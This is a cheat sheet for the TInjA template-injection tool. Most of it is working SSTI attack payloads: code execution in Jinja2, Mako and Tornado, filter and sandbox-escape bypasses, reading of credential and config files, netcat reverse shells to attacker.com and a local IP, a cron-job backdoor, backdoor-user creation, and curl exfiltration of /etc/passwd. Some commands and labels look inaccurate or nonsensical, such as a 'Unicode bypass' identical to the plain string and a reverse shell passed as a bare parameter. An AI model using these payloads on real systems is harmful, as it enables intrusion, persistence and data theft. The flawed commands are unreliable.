TInjA
Overview
TInjA (Template Injection Analyzer) is a specialized tool for identifying and exploiting Server-Side Template Injection (SSTI) vulnerabilities in web applications. It tests various template engines including Jinja2, Mako, Tornado, Genshi, Cheetah, and Twig by injecting payloads and analyzing responses to determine template engine type and exploit paths.
SSTI vulnerabilities allow attackers to inject template syntax into server-side template processors, potentially leading to arbitrary code execution, information disclosure, and complete system compromise.
Installation
From Kali Linux Repository
sudo apt-get update
sudo apt-get install tinjaFrom Source
git clone https://github.com/Hackmanit/TInjA.git
cd TInjA
python3 -m pip install -r requirements.txtDocker
docker run -it kalilinux/kali-rolling tinja --helpPython Package
pip3 install tinjaBasic Usage
| Command | Purpose |
|---|---|
tinja -url URL | Test single URL for SSTI |
tinja -u URL -p PARAM | Test specific parameter |
tinja -l FILE | Test URLs from file list |
tinja -o OUTPUT | Save results to file |
tinja --engine ENGINE | Target specific template engine |
tinja --exploit | Generate exploitation payload |
Command Options
Target Specification
# Single URL testing
tinja -url "http://target.com/page?name=test"
# Specific parameter
tinja -url "http://target.com/page?name=test" -p name
# Custom HTTP method
tinja -url "http://target.com/api" --method POST
# POST data testing
tinja -url "http://target.com/form" --data "user=test&message=test"Advanced Options
# Custom headers
tinja -url "http://target.com" -H "Authorization: Bearer token"
# Proxy configuration
tinja -url "http://target.com" --proxy "http://127.0.0.1:8080"
# SSL verification disable
tinja -url "https://target.com" --insecure
# Custom timeout
tinja -url "http://target.com" --timeout 30Template Engine Detection
Detection Methods
# Automatic engine detection
tinja -url "http://target.com/page?user=test"
# Output shows detected engine
# [+] Detected Template Engine: Jinja2
# [+] Vulnerability Type: SSTI| Template Engine | Common Parameters | File Location |
|---|---|---|
| Jinja2 | name, user, search, message | Flask, Django |
| Mako | template, view, page | Pyramid, Turbogears |
| Tornado | item, id, message | Tornado framework |
| Genshi | template, data, content | TurboGears |
| Cheetah | query, template, content | Older Python apps |
| Twig | data, template, page | PHP applications |
| Freemarker | object, model, data | Java applications |
Manual Engine Identification
# Test Jinja2-specific syntax
curl "http://target.com/page?user={{7*7}}"
# Jinja2 returns: 49
# Test Mako-specific syntax
curl "http://target.com/page?user=${7*7}"
# Mako returns: 49
# Test ERB (Ruby) syntax
curl "http://target.com/page?user=<%=7*7%>"
# ERB returns: 49SSTI Payload Testing
Mathematical Expressions
# Basic arithmetic test
tinja -url "http://target.com/page?name={{7*7}}"
# Boolean logic test
tinja -url "http://target.com/page?name={{1==1}}"
# String concatenation test
tinja -url "http://target.com/page?name={{'hello'+'world'}}"Blind SSTI Detection
# Time-based blind SSTI
tinja -url "http://target.com/page?name={{range(1000000)}}" --method GET
# String comparison blind test
tinja -url "http://target.com/page?name={%if 1==1%}A{%endif%}B"
# Output should show difference indicating template processingFilter Bypass Techniques
# Underscore bypass
{{request.__class__}}
# Bracket notation bypass
{{self[request.args.key]}}
# Concatenation bypass
{{"__cl"+"ass__"}}
# Unicode bypass
{{"__class__"}}
# Hex bypass
{{"\x5f\x5fclass\x5f\x5f"}}Code Execution Payloads
Jinja2 Exploitation
# Access object attributes
{{config}}
# File reading
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
# Command execution
{{cycler.__init__.__globals__['os'].popen('whoami').read()}}
# Alternative RCE
{{''.join(request.args.get('cmd')|list)}}
# Reverse shell
tinja -url "http://target.com/page?cmd=nc -e /bin/sh attacker.com 4444"Mako Exploitation
# Expression injection
${os.popen('id').read()}
# Python code execution
<%
import os
os.system('whoami')
%>
# File access
${open('/etc/passwd').read()}Tornado Exploitation
# Basic RCE
{%set cmd='id'%}{%set result=os.popen(cmd).read()%}
# Module import
{%import os%}${os.popen('whoami').read()}Information Gathering
Extract Configuration Data
# Get config variables
tinja -url "http://target.com/page?name={{config}}" --exploit
# Access environment
tinja -url "http://target.com/page?name={{environ}}" --exploit
# List available globals
tinja -url "http://target.com/page?name={{globals()}}"File Reading
# Read /etc/passwd
tinja -url "http://target.com/page?name={{open('/etc/passwd').read()}}"
# Read application files
tinja -url "http://target.com/page?name={{open('../../config.py').read()}}"
# Read environment files
tinja -url "http://target.com/page?name={{open('.env').read()}}"Source Code Disclosure
# Read template source
tinja -url "http://target.com/page?name={{self.module.__loader__.get_source(None, 'app')}}"
# Read Python files
tinja -url "http://target.com/page?name={{open('../app.py').read()}}"Exploitation Workflow
Step-by-Step Exploitation
# 1. Identify vulnerability
tinja -url "http://target.com/page?user=test"
# 2. Detect template engine
# Output indicates Jinja2
# 3. Test basic payload
curl "http://target.com/page?user={{7*7}}"
# 4. Generate RCE payload
tinja -url "http://target.com/page?user=PAYLOAD" --exploit
# 5. Execute payload
curl "http://target.com/page?user={{cycler.__init__.__globals__['os'].popen('id').read()}}"
# 6. Establish reverse shell
curl "http://target.com/page?user={{cycler.__init__.__globals__['os'].popen('nc -e /bin/sh 192.168.1.100 4444').read()}}"Batch Testing from File
# Create URL list
cat > urls.txt << EOF
http://target.com/page?name=test
http://target.com/search?q=test
http://target.com/user?id=1
EOF
# Test all URLs
tinja -l urls.txt -o results.txt
# Review findings
cat results.txtOutput Analysis
Report Generation
# Save detailed report
tinja -url "http://target.com" -o report.txt
# JSON output format
tinja -url "http://target.com" -o report.json --format json
# HTML report
tinja -url "http://target.com" -o report.html --format htmlReport Contents
# View discovered vulnerabilities
grep -i "vulnerable\|ssti" report.txt
# Extract payload
grep -i "payload" report.txt
# List affected parameters
grep -i "parameter" report.txtAdvanced Techniques
Bypassing Input Filters
Bypassing Quotes
# String comparison without quotes
{{7*7}}
# Using chr() function
{{chr(72)+chr(101)+chr(108)+chr(108)+chr(111)}}
# Using request.args
{{request.args.get('x')}}Bypassing Blacklists
# Case manipulation
{{request|safe}}
{{REQUEST|safe}}
# Comment injection
{{request/*bypass*/}}
# Null byte injection
{{request\x00}}
# Unicode normalization
{{request}}Concatenation Bypass
# Escaped concatenation
{{'__cla'+'ss__'}}
# Using format
{{'{}{}'.format('__class__')}}
# Using join
{{''.join(['__','class__'])}}WAF Evasion
# Obfuscate payload
{{().__class__.__bases__[0].__subclasses__()}}
# Use alternative methods
{{self.__init__.__globals__}}
# Fragment injection
{{requ
est}}
# Newline injection
{{request
.method}}Polyglot Payloads
# Works across multiple engines
{{7*7}}${7*7}<%= 7*7 %>
# Detects engine by response
tinja -url "http://target.com/page?name={{7*7}}" --engine autoPost-Exploitation
Establish Persistence
# Create backdoor
tinja -url "http://target.com/page?name=PAYLOAD" --exploit
# Add cron job
{{os.popen('echo "* * * * * nc -e /bin/sh attacker.com 4444" | crontab -').read()}}
# Create user
{{os.popen('useradd -m -s /bin/bash backdoor').read()}}Data Exfiltration
# Read sensitive files
tinja -url "http://target.com/page?name={{open('/var/www/config.php').read()}}"
# Exfiltrate to attacker server
{{os.popen('curl http://attacker.com?data=$(cat /etc/passwd|base64)').read()}}
# Encode output
{{os.popen('cat /etc/passwd | base64').read()}}Defensive Bypass
Template Sandbox Escape
# Access restricted globals
{{().__class__.__bases__[0].__subclasses__()}}
# Import modules in restricted environment
{{__import__('os').popen('id').read()}}
# Use __builtins__
{{__builtins__['eval']('7*7')}}Restricted Characters Bypass
# Avoid brackets
{{().__class__.__bases__.__getitem__(0)}}
# Use getattr
{{getattr(request, '__class__')}}
# Use globals
{{self.__init__.__globals__['__builtins__']}}Mitigation Verification
Testing Fixes
# Verify input sanitization
tinja -url "http://target.com/page?name=<test>" -v
# Check output encoding
tinja -url "http://target.com/page?name={{7*7}}" -v
# Validate filter implementation
tinja -url "http://target.com/page?name={{__import__}}"Common Parameters to Test
# URL parameters
?name=test
?user=test
?search=test
?q=test
?id=1
?page=test
# POST fields
username=test
email=test
message=test
title=test
content=test
description=test
# Headers
User-Agent: test
Referer: test
X-Custom-Header: testAutomation Scripts
Continuous Testing
#!/bin/bash
# tinja-scan.sh - Automated SSTI scanning
while read url; do
echo "[*] Testing: $url"
tinja -url "$url" -o "results_$(date +%s).txt"
done < urls.txtIntegration with Burp Suite
# Export Burp requests
# Use Burp to intercept requests
# Convert to tinja format for automated testing
tinja -l burp_export.txt -o burp_results.txtTroubleshooting
Common Issues
| Issue | Solution |
|---|---|
| No detection on known vulnerable app | Try different parameters, adjust timeout |
| False positives | Verify manually with browser, increase precision |
| Connection timeout | Adjust timeout value, check proxy settings |
| SSL errors | Use --insecure flag for self-signed certs |
| No output | Check URL format, verify target is running |
Debug Mode
# Verbose output
tinja -url "http://target.com" -v
# Show all requests
tinja -url "http://target.com" --debug
# Save traffic log
tinja -url "http://target.com" --log traffic.logLegal and Ethical Considerations
- Authorization Required: Only test systems you own or have explicit written permission to test
- Responsible Disclosure: Report findings to vendor/organization before public disclosure
- Compliance: Follow OWASP testing guidelines and legal requirements
- Documentation: Maintain detailed records of all testing activities
- Scope Limitation: Stay within defined testing scope and parameters
Resources
- OWASP SSTI: https://owasp.org/www-community/Server-Side_Template_Injection
- HackTricks SSTI: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
- TInjA GitHub: https://github.com/Hackmanit/TInjA
TInjA is essential for comprehensive web application security assessments, helping identify template injection vulnerabilities that can lead to complete system compromise.